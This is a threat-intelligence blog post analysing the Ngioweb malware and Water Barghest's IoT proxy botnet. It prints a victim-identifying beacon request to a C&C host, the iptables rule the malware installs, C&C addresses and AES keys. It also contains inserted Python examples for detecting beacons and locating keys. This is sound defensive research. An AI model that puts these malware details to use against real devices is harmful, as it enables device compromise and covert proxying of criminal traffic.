IoT

INSIDE WATER BARGHEST’S RAPID EXPLOIT-TO-MARKET STRATEGY FOR IOT DEVICES

In this blog entry, we discuss Water Barghest's exploitation of IoT devices, transforming them into profitable assets through advanced automation and monetization techniques.

By: Feike Hacquebord, Fernando Mercês
November 18, 2024
Read time: 12 min (3329 words)

SUMMARY

* Water Barghest, which comprised over 20,000 IoT devices by October 2024, monetizes IoT devices by exploiting vulnerabilities and quickly enlisting them for sale on a residential proxy marketplace.
* Its botnet uses automated scripts to find and compromise vulnerable IoT devices sourced from public internet scan databases like Shodan.
* Once IoT devices are compromised, the Ngioweb malware is deployed, which runs in memory and connects to command-and-control servers to register the compromised device as a proxy.
* The monetization process, from initial infection to the availability of the device as a proxy on a residential proxy marketplace, can take as little as 10 minutes, indicating a highly efficient and automated operation.
There is a big incentive for both espionage-motivated actors and financially motivated actors to set up proxy botnets. These can serve as an anonymization layer, which can provide plausibly geolocated IP addresses to scrape contents of websites, access stolen or compromised online assets, and launch cyber-attacks. Examples of proxy botnets set up by advanced persistent threat (APT) actors are the VPNFilter botnet and Cyclops Blink, both deployed by Sandworm and disrupted by the Federal Bureau of Investigation (FBI) in 2018 and 2022, respectively. Another example is the SOHO botnet alleged to be operated by a Chinese company called the Beijing Integrity Technology Group; this botnet was disrupted in September 2024 by the FBI. The cybercriminal group Water Zmeu had a proxy botnet primarily consisting of Ubiquiti EdgeRouter devices, which was used by nation-state actor Pawn Storm (also known as APT28 and Forest Blizzard) for two years for their espionage campaigns.

In this blog entry, we discuss our findings on another proxy botnet we associate with Water Barghest’s intrusion set. This botnet was estimated to have more than 20,000 compromised Internet-of-Things (IoT) devices in October 2024.

The starting point of our discovery of Water Barghest’s intrusion set was our decade-old research into nation-state actor Pawn Storm. Many Ubiquiti EdgeRouter devices had been used by this nation-state actor since April 2022 in their espionage campaigns. Ubiquiti routers were the source of spear-phishing e-mails to numerous government organizations all over the world; they were used as SMB reflectors in NTLMv2 hash relay attacks, and they served as proxies to send stolen credentials on phishing websites to upstream servers. In January 2024, the FBI tried to stop these espionage campaigns by disrupting the third-party criminal router botnet that Pawn Storm was using.
We associate this router botnet, which consisted primarily of Ubiquiti EdgeRouter devices, with the Water Zmeu intrusion set. During our investigation, we got our hands on a couple of the EdgeRouter devices that had been used by Pawn Storm, and we indeed found traces of espionage campaigns and the router malware of Water Zmeu. We also found mysterious processes running in memory only, called um or mm. These processes appeared to be instances of Ngioweb malware running in memory, and this led us to the discovery of the Ngioweb botnet of Water Barghest. Apparently, some cybercriminals and APT actors share compromised infrastructure, knowingly or unknowingly.

For more than five years, no significant publications on the Ngioweb botnet of Water Barghest appeared while the botnet was up and running. This means that the actor group behind Water Barghest managed to keep a low profile. Like several other cybercriminals, Water Barghest did not make headlines in the news because of their careful operational security and high degree of automation. They had a steady income fueled by their cybercriminal activities, but they did not get the scrutiny they deserved. They quietly erased log files from their servers and made forensic analysis more difficult. They removed human error from their operations by automating almost everything. They also removed financial traceability by using cryptocurrency for anonymous payments.

However, they slipped up and suddenly had the spotlight pointed at them. This was because of a misjudgment, an operational mistake, or the use of a vulnerability that made them greedy. One example of this is the well-mediatized usage of the zero-day vulnerability that was used against Cisco IOS XE devices in October 2023. Tens of thousands of Cisco routers were affected, and naturally, this sparked the interest of the security industry.
We, too, became interested in the ever-intriguing question of whodunnit, and ultimately, we solved it at the technical level: we found that the attackers’ infrastructure that was used to compromise thousands of Cisco IOS XE routers belonged to the five-year-old intrusion set of Water Barghest. This makes it very plausible that it was the Water Barghest group who had used the Cisco IOS XE device zero-day in October 2023. And yet, even without the seemingly reckless usage of the Cisco IOS XE zero-day against tens of thousands of routers, we would have discovered Water Barghest’s router botnet operations anyway through our decade-long research into Pawn Storm as mentioned above.

A series of seemingly unrelated events led us to the discovery of the way Water Barghest had automated every step between finding vulnerable routers and IoT devices on the internet, exploiting these devices, uploading and executing malware on them, and then monetizing the compromised assets for a steady income on an online marketplace of residential proxies. One of the striking characteristics of the Water Barghest botnet is its high degree of automation, which will be discussed in the following section.

WATER BARGHEST’S AUTOMATION

Figure 1. Automation by Water Barghest: from using IoT exploits to monetizing IoT bots on a residential proxy marketplace

As far as we know, apart from acquiring IoT exploits, Water Barghest has automated each step between finding vulnerable IoT devices and putting them up for sale on a residential proxy marketplace (Figure 1). However, it all starts with acquiring IoT device vulnerabilities: oftentimes these will be n-days, but in at least one case Water Barghest utilized a zero-day. With a list of exploits in hand, Water Barghest uses search queries on a publicly available internet scan database like Shodan to find vulnerable devices and their IP addresses.
After retrieving these IP addresses, Water Barghest uses a set of data-center IP addresses, which are often long-lived, to try the exploits against potentially vulnerable IoT devices. When an exploit is successful, the compromised IoT device downloads a script that iterates through Ngioweb malware samples compiled for different Linux architectures. When one of the samples runs fine, the Ngioweb malware will run in memory on the victim’s IoT device. This means that the infection is not persistent; a reboot would remove the infection.

When Ngioweb runs, it will register with a command-and-control (C&C) server. Oftentimes, within minutes the bot will receive instructions to connect to one of the residential proxy provider’s 150 entry points (Figure 2). A speed test and name server test will follow, and the information will be sent to and listed on the marketplace. The whole procedure between initial infection and making the bot available as a proxy on the marketplace may take no longer than 10 minutes. This shows again the professionalism and maturity of this threat actor, who has been around for more than five years.

Figure 2. Estimated breakdown of the residential proxy provider’s proxies by device type, based on 2,900 IP addresses we verified to be exit nodes of the marketplace at the end of October 2024

At the time of writing, Water Barghest deploys about 17 workers on virtual private servers (VPS) that continuously scan routers and IoT devices for known vulnerabilities. The same workers are also used to upload Ngioweb malware to freshly compromised IoT devices. Water Barghest has probably been using this mode of operation for years, with the worker IP addresses changing slowly over time. This setup has provided a steady income for Water Barghest for years.

NGIOWEB MALWARE EVOLUTION

2018: Ramnit-powered Windows botnet

The Ngioweb malware strain goes back to 2018, when Check Point Research revealed it was being dropped by a Ramnit Trojan.
At the time, Ngioweb targeted computers using the Microsoft Windows operating system. The malware was already designed for turning an infected machine into a malicious proxy server. A few samples even go back to 2017, but the command-and-control (C&C) domain that gives the malware its name was registered in 2018: ngioweb[.]su. If you're curious about the .su top-level domain (TLD), it’s associated with the Soviet Union, and although the USSR doesn’t exist anymore, the TLD is still valid.

2019: WordPress servers botnet

In 2019, Netlab researchers found the Linux variant of Ngioweb. The malware worked similarly to its previous Windows version, but it had domain generation algorithm (DGA) features added. According to Netlab, the botnet was built mostly of web servers with WordPress installed, which suggests the threat actor could be exploiting a WordPress – or a WordPress plugin – vulnerability. One of the parameters sent to the first-stage C&C server was the ‘sv’ parameter (likely short for “software version”), which contained the value 5003. Just like its Windows version, Ngioweb used two-stage C&C servers and implemented its own binary protocol over TCP for communicating with the second-stage C&C server.

2020: IoT devices botnet

In 2020, Water Barghest changed their targets to IoT devices. We found Ngioweb samples compiled for many different architectures. Additionally, Netlab published a blog entry and Intezer posted on X about a live Ngioweb botnet. According to Netlab, the threat actor was exploiting nine different n-day vulnerabilities in IoT devices; this included NAS devices from QNAP and Netgear, but also D-Link devices, among others. The software version defined in the ‘sv’ field was changed to 0005.

2024: Expanded targets

In 2024, we saw the IoT botnet created by Water Barghest at its full potential.
The processes we found running in a bunch of EdgeRouter devices turned out to be a new version of Ngioweb. It works very similarly to its previous versions. When running, the malware performs the following actions:

* Initializes function pointers at runtime, which makes static analysis harder.
* Ignores any ignorable signals received from the kernel.
* Renames itself to “[kworker/0:1]” in an attempt to look like a kernel thread in the process list.
* Closes the stdin, stdout, and stderr file descriptors to prevent any error reporting.
* Disables the kernel’s watchdog, effectively preventing it from rebooting the device.
* Reads the contents of /etc/machine-id (which will be sent to the first-stage C&C later).
* Decrypts its AES-256-ECB (no padding) encrypted configuration.
* Generates and tries to resolve the DGA domains of the first-stage C&C.

Its main function is shown in Figure 3.

Figure 3. Ngioweb’s main function

The encrypted configuration is usually at the beginning of the .data section. In the following sample, the key is at offset 0x0c from the start of the .data section and the encrypted data blob is 512 bytes in size (Figure 4).

Figure 4. AES key and encrypted data

The encrypted configuration includes the ‘sv’ value, DGA seed and count, and C&C URL path, among other settings we didn’t fully analyze. Figure 5 shows a decrypted configuration with highlighted values of ‘sv’, DGA seed and count, C&C port and C&C URL path, respectively.

Figure 5. Decrypted configuration

We’ve also created a Python script to decrypt the configuration of Ngioweb samples, which is available in our GitHub repository.
The following is an example output:

> PS D:\> python ngioweb_config_extractor.py c267e0
> [DEBUG] AES key found at offset 0xc from .data section
> AES key (hex):
> db1f96b20679f9fb9cbd96b242ab8530102c0105b64c83c3ae544f87594a6fa9
> DGA seed (hex): 0221d333
> DGA count: 1000
> URL path: /jquery.js
> sv: 271a

For every generated domain the malware tries to resolve with A/AAAA requests, it also sends a TXT request expecting a base64-encoded binary blob (Figures 6 and 7).

Figure 6. First-stage C&C response for a DNS TXT request

Figure 7. First-stage C&C response for a DNS TXT request

Unfortunately, we didn’t finish the full analysis of how this binary blob is used. Nonetheless, the next stage is to send a GET request to the C&C server. Like its previous versions, this request is an unencrypted request on port 443/tcp and contains some base64-encoded data that identifies the victim:

> GET /jquery.js?h=aWQ9MDEyMzQ1Njc4OWFiY2RlZiZ2PWFybXY3bCZzdj0yNzFhJnlic25xbndmYXR5anV0c2w= HTTP/1.1\r\n
> Host: ultradomafy.net\r\n
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\r\n
> Accept: text/html\r\n
> Connection: close\r\n
> \r\n

The sample base64-decoded data is as follows:

> id=0123456789abcdef&v=armv7l&sv=271a&ybsnqnwfatyjutsl

* id - first 16 characters from /etc/machine-id
* v - architecture of the infected device
* sv - software version (assumed)
* <random string with 16 lowercase letters>

In this version, the ‘sv’ parameter changed to 271a. The first-stage C&C server response has the following format:

> HTTP/1.1 200 OK\r\n
> Server: openresty/1.19.9.1\r\n
> Date: Mon, 11 Mar 2024 23:23:47 GMT\r\n
> Content-Type: text/plain; charset=utf-8\r\n
> Content-Length: 8\r\n
> Connection: close\r\n
> \r\n
> WAIT 60\n

The above response contains the WAIT command, which instructs the malware to wait a few seconds before querying the C&C server again.
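As an added example (written for this page, not Trend Micro's tooling or the script in their repository), the parser below decodes the first-stage beacon quoted above and splits a C&C reply into the command words the post documents (WAIT, CONNECT, DISCONNECT, CERT); the access-log lines it scans are constructed, and the scan function is the defender-side check for beacons of this shape in web or proxy logs.

```python
import base64
import binascii
import re

# Command words the post documents for first-stage C&C replies.
KNOWN_COMMANDS = {"WAIT", "CONNECT", "DISCONNECT", "CERT"}

ID_RE = re.compile(r"^[0-9a-f]{16}$")     # first 16 chars of /etc/machine-id
NONCE_RE = re.compile(r"^[a-z]{16}$")     # trailing 16 random lowercase letters
# The base64 blob is sent unescaped, so pull 'h' out by regex rather than
# parse_qs, which would turn a literal '+' into a space.
H_PARAM_RE = re.compile(r"[?&]h=([A-Za-z0-9+/]+=*)")
REQ_LINE_RE = re.compile(r"^GET (\S+) HTTP/1\.[01]$")
# Leading fields of a combined-format access-log line: ip ident user [time] "request"
LOG_REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]+)"')


def decode_beacon_param(h):
    """Decode the base64 'h' value into {'id','v','sv','nonce'}, or return
    None if it does not have the id=&v=&sv=&<nonce> layout shown in the post."""
    try:
        raw = base64.b64decode(h, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    parts = raw.split("&")
    if len(parts) != 4:
        return None
    fields = {}
    for kv in parts[:3]:
        key, sep, value = kv.partition("=")
        if not sep:
            return None
        fields[key] = value
    nonce = parts[3]
    if set(fields) != {"id", "v", "sv"}:
        return None
    if not ID_RE.match(fields["id"]) or not NONCE_RE.match(nonce):
        return None
    fields["nonce"] = nonce
    return fields


def parse_beacon_request(request_line):
    """Return decoded beacon fields for a 'GET /jquery.js?h=... HTTP/1.1'
    request line, or None for anything else."""
    m = REQ_LINE_RE.match(request_line.strip())
    if not m:
        return None
    target = m.group(1)
    if target.split("?", 1)[0] != "/jquery.js":
        return None
    h = H_PARAM_RE.search(target)
    if not h:
        return None
    return decode_beacon_param(h.group(1))


def parse_c2_response(body):
    """Split a first-stage response body into (command, args) tuples.
    Lines outside the documented command set come back as ('UNKNOWN', [line])
    so a detector can still surface them."""
    commands = []
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        word, *args = line.split()
        if word == "WAIT" and len(args) == 1 and args[0].isdigit():
            commands.append(("WAIT", [int(args[0])]))   # seconds to wait
        elif word in KNOWN_COMMANDS and word != "WAIT":
            commands.append((word, args))
        else:
            commands.append(("UNKNOWN", [line]))
    return commands


# Constructed access-log lines (documentation-range IPs, not real traffic);
# only the first one carries a beacon of the documented shape.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [11/Mar/2024:23:23:47 +0000] "GET /jquery.js?h=aWQ9MDEyMzQ1Njc4OWFiY2RlZiZ2PWFybXY3bCZzdj0yNzFhJnlic25xbndmYXR5anV0c2w= HTTP/1.1" 200 8',
    '203.0.113.11 - - [11/Mar/2024:23:24:01 +0000] "GET /jquery.js HTTP/1.1" 200 89501',
    '203.0.113.12 - - [11/Mar/2024:23:24:09 +0000] "GET /index.html?h=aGVsbG8= HTTP/1.1" 200 512',
]


def scan_log_lines(lines):
    """Return (client_ip, beacon_fields) for every log line whose request
    decodes as an Ngioweb first-stage beacon."""
    hits = []
    for line in lines:
        m = LOG_REQ_RE.match(line)
        if not m:
            continue
        fields = parse_beacon_request(m.group(2))
        if fields:
            hits.append((m.group(1), fields))
    return hits


if __name__ == "__main__":
    for ip, fields in scan_log_lines(SAMPLE_LOG_LINES):
        print(ip, fields)
    print(parse_c2_response("WAIT 60\n"))
```

Logs in another layout only need a different LOG_REQ_RE; the beacon and command parsing stay the same.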
The WAIT parameter is the number of seconds to wait (60 in the example). Supported commands are:

* WAIT
* CONNECT
* DISCONNECT
* CERT

This is in line with previous versions. Different child processes check if the following iptables rule is present:

iptables -I INPUT -p tcp --tcp-flags RST RST -j DROP --sport 5000:55000

If the rule is not already active in netfilter, the malware adds it. We believe this is to prevent connection resets, ensuring its communication channels remain open.

After waiting 60 seconds, the malware might get a different answer, as shown in Figure 8:

Figure 8. Malware receives three commands: CONNECT, CERT, and WAIT

This instructs the malware to connect to a second-stage C&C, 195.154.43.182 in this case. We associate this second-stage IP address with one of the about 150 entry nodes of the residential proxy service. Before publishing the new victim’s IP address for sale as a reverse proxy on the residential proxy marketplace’s website, the malware downloads a big file containing random bytes from the second-stage C&C (Figure 9).

Figure 9. File downloaded from second-stage C&C

This is to estimate the victim’s bandwidth, which we believe will be used to calculate the final price on the residential proxy marketplace.

In this version, Water Barghest expanded Ngioweb’s list of targeted IoT devices, which now includes IoT devices from more brands, such as:

* Cisco
* DrayTek
* Fritz!Box
* Linksys
* Netgear
* Synology
* Tenda
* Western Digital
* Zyxel

Water Barghest has been targeting devices from the brands above with a range of n-day vulnerabilities, including many old ones.

RESIDENTIAL PROXY MARKETPLACE

In our assessment, a significant part of the exit nodes that a particular residential proxy marketplace offers for rent belong to devices that are infected with Ngioweb malware.
In a couple of cases, we were able to verify that a fresh Ngioweb infection resulted in the corresponding IP address being offered for rent on the marketplace’s website within a few minutes after the initial infection (Figure 10). The residential proxy provider allows for cryptocurrency payments only.

Figure 10. Residential proxy marketplace’s website

As far as we can tell, the proxies on the residential proxy marketplace (Figure 11) are back-connect proxies. Ngioweb bots are instructed to connect to one of about 150 datacenter IP addresses we associate with the marketplace, which are also used as second-stage C&C for Ngioweb-infected devices. Paying users of the residential proxy service can then connect to a temporary high TCP port on one of the 150 datacenter IP addresses and route their traffic through the Ngioweb bots.

Figure 11. Breakdown of proxies by country according to the residential proxy marketplace’s website. Data checked in October 2024.

We were able to explicitly enumerate a significant part of the marketplace’s residential proxy network over time and verify that Ngioweb bots were added to the marketplace’s offerings within 10 minutes after initial infection.

OUTLOOK AND CONCLUSIONS

For years, mid-sized proxy botnets have existed without being disrupted or publicly reported on. Examples are the botnets we associate with the Water Barghest and Water Zmeu intrusion sets. The actor groups behind these intrusion sets have refined their setup over the years and automated their operations to a high degree. Eventually, some of these botnets were brought to the attention of the security industry. In the case of Water Barghest, this was because of the use of Water Barghest’s infrastructure to deploy a zero-day against Cisco IOS XE devices that infected tens of thousands of routers in October 2023.
In the case of Water Zmeu, APT actor Pawn Storm’s use of this criminal botnet for espionage purposes motivated the FBI to disrupt the Water Zmeu-associated router botnet. Upon completing our write-up on Water Barghest's activities, we became aware of a LevelBlue blog entry that partially overlaps with our findings.

APT actors have also deployed their own dedicated IoT botnets, sometimes for years, before they were disrupted by the FBI and its partners. APT actors and financially motivated actors will continue to have an interest in building their own IoT botnets for anonymization purposes and espionage. They will also continue to use third-party botnets or commercially available residential proxy services. We expect that both the commercial market for residential proxy services and the underground market for proxies will grow in the coming years, because the demand from APT actors and cybercriminal actor groups is high.

Protecting against these anonymization layers is a challenge for many enterprises and government organizations around the world. Court-approved disruptions of proxy botnets will help put a dent in malign operations, but it is better to do something about the source of the problem: securing IoT devices is of paramount importance, and whenever possible, these devices should not be exposed to incoming connections from the open internet. Whenever an IoT device accepts incoming connections on the open internet, commercial scanning services will quickly find it online, and malicious actors can find it too via bought or stolen access to these internet scanning services. Using internet scan data, the automated scripts of bad actors can quickly try known vulnerabilities, and possibly even zero-days, against the exposed IoT devices. In the case of Water Barghest, we have seen that the time between exploiting an IoT device and putting it up for sale on a residential proxy marketplace can be as little as 10 minutes.
Therefore, it is important not to expose IoT devices to incoming internet connections whenever it is not business-essential, and to put mitigations in place so that an organization's own infrastructure does not become part of the problem.

TREND MICRO VISION ONE THREAT INTELLIGENCE

To stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and be better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.

Trend Micro Vision One Intelligence Reports App
[IOC Sweeping] Ngioweb IoCs used in Water Barghest Campaigns

Trend Micro Vision One Threat Insights App
Threat Actors: Water Barghest
Emerging Threats: Water Barghest's Rapid Exploit-to-Market Strategy for IoT Devices

HUNTING QUERIES

Trend Micro Vision One Search App

Trend Micro Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post against data in their environment.

Detection of Ngioweb malware:

malName:*NGIOWEB* AND eventName:MALWARE_DETECTION

More hunting queries are available for Vision One customers with the Threat Insights entitlement enabled.

INDICATORS OF COMPROMISE (IOCS)

The full list of IOCs can be found here. For DGA-generated domains, please refer to this GitHub repository.

YARA RULES

As Ngioweb samples are highly obfuscated, an easy approach is to look for known AES keys in the .data section. However, some samples lack section headers, so a rule scoped to .data would miss them. In that case, searching for the AES key in the whole binary (or in a loadable segment) does the job.
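The .data-first, fall-back-to-segment logic described above, as an added example that is not part of Trend Micro's published YARA rules: the script parses ELF64 headers by hand, looks for a known key inside the .data section, falls back to the PT_LOAD segments when the section header table has been stripped, and finally scans the whole file. The key, the synthetic sample builder and all offsets are constructed for this demo and are assumptions; when scanning real samples, substitute the keys from the published rule set.

```python
"""Locate a known Ngioweb-style AES key in an ELF64 sample.

Strategy follows the YARA note above: prefer a hit inside the .data section;
if the section header table has been stripped, fall back to the PT_LOAD
segments; as a last resort scan the whole file. The sample binaries built
below are constructed for this example and are not executable programs.
"""
import struct

ELF_HDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, little-endian
PHDR = struct.Struct("<IIQQQQQQ")              # Elf64_Phdr
SHDR = struct.Struct("<IIQQQQIIQQ")            # Elf64_Shdr
PT_LOAD = 1

# Placeholder key for the demo (an assumption, not an IOC); real keys come
# from the published YARA rules.
EXAMPLE_KEY = bytes.fromhex("00112233445566778899aabbccddeeff" * 2)


def parse_elf64(blob):
    """Return (program headers, [(name, offset, size)] per section).

    The section list is empty when e_shoff/e_shnum are zero, i.e. when the
    section header table was stripped from the sample.
    """
    if blob[:4] != b"\x7fELF" or blob[4] != 2:
        raise ValueError("not an ELF64 file")
    (_, _, _, _, _, phoff, shoff, _, _, phentsize, phnum,
     shentsize, shnum, shstrndx) = ELF_HDR.unpack_from(blob, 0)
    phdrs = [PHDR.unpack_from(blob, phoff + i * phentsize) for i in range(phnum)]
    sections = []
    if shoff and shnum:
        raw = [SHDR.unpack_from(blob, shoff + i * shentsize) for i in range(shnum)]
        strtab = raw[shstrndx][4]                  # sh_offset of .shstrtab
        for sh in raw:
            start = strtab + sh[0]                 # sh_name indexes .shstrtab
            name = blob[start:blob.index(b"\x00", start)].decode()
            sections.append((name, sh[4], sh[5]))  # sh_offset, sh_size
    return phdrs, sections


def locate_key(blob, key):
    """Return (where, file_offset) for the first hit, or None.

    where is ".data" for a hit inside the .data section, "PT_LOAD" for a hit
    in a loadable segment of a sample without section headers, and "raw"
    when only a whole-file scan finds the key.
    """
    phdrs, sections = parse_elf64(blob)
    for name, off, size in sections:
        if name == ".data":
            hit = blob.find(key, off, off + size)
            if hit != -1:
                return ".data", hit
    if not sections:                               # stripped: use segments
        for p_type, _, p_offset, _, _, p_filesz, _, _ in phdrs:
            if p_type == PT_LOAD:
                hit = blob.find(key, p_offset, p_offset + p_filesz)
                if hit != -1:
                    return "PT_LOAD", hit
    hit = blob.find(key)
    return ("raw", hit) if hit != -1 else None


def build_sample(key, strip_sections=False):
    """Construct a minimal ELF64 image carrying `key` inside a .data section
    that is also covered by one PT_LOAD segment. With strip_sections=True the
    section header table and .shstrtab are omitted, mimicking samples whose
    section headers were removed."""
    payload = b"\x00" * 16 + key + b"\x00" * 16
    data_off, data_size = 0x80, len(payload)
    shstrtab = b"\x00.data\x00.shstrtab\x00"
    shstr_off = data_off + data_size
    sh_off = (shstr_off + len(shstrtab) + 7) & ~7     # 8-byte aligned
    vaddr = 0x400000 + data_off
    phdr = PHDR.pack(PT_LOAD, 4, data_off, vaddr, vaddr, data_size, data_size, 0x1000)
    shdrs = (SHDR.pack(0, 0, 0, 0, 0, 0, 0, 0, 0, 0)                        # SHT_NULL
             + SHDR.pack(1, 1, 3, vaddr, data_off, data_size, 0, 0, 8, 0)     # .data
             + SHDR.pack(7, 3, 0, 0, shstr_off, len(shstrtab), 0, 0, 1, 0))  # .shstrtab
    shoff, shentsize, shnum, shstrndx = (
        (0, 0, 0, 0) if strip_sections else (sh_off, SHDR.size, 3, 2))
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS64, LSB
    hdr = ELF_HDR.pack(ident, 2, 0x3E, 1, 0, ELF_HDR.size, shoff, 0, ELF_HDR.size,
                       PHDR.size, 1, shentsize, shnum, shstrndx)
    body = bytearray(hdr + phdr)
    body += b"\x00" * (data_off - len(body))
    body += payload
    if not strip_sections:
        body += shstrtab
        body += b"\x00" * (sh_off - len(body))
        body += shdrs
    return bytes(body)


if __name__ == "__main__":
    print(locate_key(build_sample(EXAMPLE_KEY), EXAMPLE_KEY))
    print(locate_key(build_sample(EXAMPLE_KEY, strip_sections=True), EXAMPLE_KEY))
```

The point of the fallback is the one the text makes: a rule that only inspects .data silently misses a sample whose section table was removed, while a whole-file scan still matches. In a YARA rule the same branching can be written with the elf module (elf.number_of_sections, elf.sections[i].name/offset/size, and elf.segments[i].type/offset/file_size) instead of the hand-rolled parser used here for illustration.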
There are also samples with the AES key c91795b59248562e44d6c07526c7ab89dfe45344293703a94a3ae5ff02eab5a4 that we believe could be part of some test, so we did not include them in our IOC list. The YARA rules can be found here.

Tags: Articles, News, Reports | Threats | IoT

AUTHORS
* Feike Hacquebord, Sr. Threat Researcher
* Fernando Mercês, Sr. Threat Researcher

Copyright ©2024 Trend Micro Incorporated. All rights reserved.